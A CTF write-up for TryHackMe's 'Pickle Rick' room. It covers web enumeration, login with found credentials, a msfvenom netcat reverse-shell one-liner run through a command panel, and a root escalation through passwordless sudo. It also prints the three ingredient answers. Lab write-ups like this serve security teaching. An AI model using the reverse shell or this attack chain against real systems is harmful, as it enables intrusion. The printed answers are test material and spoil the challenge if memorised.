Pickle Rick CTF – Writeup

This is a CTF on TryHackMe website.

The task is that you will have to help Pickle Rick find 3 ingredients so he can turn himself back into a human.

When you deploy the machine you are presented with a website.

Enumeration stage

The first thing I like to do is look at the source code. We find a username: R1ckRul3s.

We can look for any hidden directories. I like to use Gobuster for this task. The command I´ll use is:

gobuster dir -u http://10.10.222.6 -w /usr/share/wordlists/dirb/common.txt -q

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/assets (Status: 301)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)

In /robots.txt we find something interesting.

Wubbalubbadubdub

It is smart to use other tools aswell, and not just rely on one. You can use photon, raccoon or Nikto for example. I will use Nikto with the command:

nikto -h 10.10.222.6

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.222.6
+ Target Hostname:    ip-10-10-222-6.eu-west-1.compute.internal
+ Target Port:        80
+ Start Time:         2021-05-22 23:49:17 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x426 0x5818ccf125686 
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2021-05-22 23:49:26 (GMT1) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We find an admin login page, /login.php.

From previous enumeration we found the username, and from robots.txt we would assume that that would be the password.

After logging in, we are presented with this.

---

Gaining Access

The other tabs only says that: Only the real rick can enter.

We will try out some commands, like ls.

We found the first ingredient. Lets try and cat it.

That dosent work. Iinstead I will try and create a reverse shell to the webserver instead.

We can use msvenom to generate a revershell payload that we can try and run.

root@ip-10-10-235-26:~# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.235.26 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 94 bytes
mkfifo /tmp/siank; nc 10.10.83.119 4444 0</tmp/siank | /bin/sh >/tmp/siank 2>&1; rm /tmp/siank

I will setup netcat so it listens to port 4444 and execute the command on the website. This will give me a reverse Shell, and I can try and read the files again.

root@ip-10-10-235-26:~# nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.10.222.6 35688 received!@
ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair

The clue says: Look around the file system for the other ingredient.

cd home
ls
rick
ubuntu
cd rick
ls
second ingredients
cat second\\ ingredients
1 jerry tear

We can try and see if the user is in sudoers. There is no password for sudo, which is not good.

sudo su
su - root
mesg: ttyname failed: Inappropriate ioctl for device
whoami
root
cd /root
ls
3rd.txt
snap
cat 3rd.txt
3rd ingredients: fleeb juice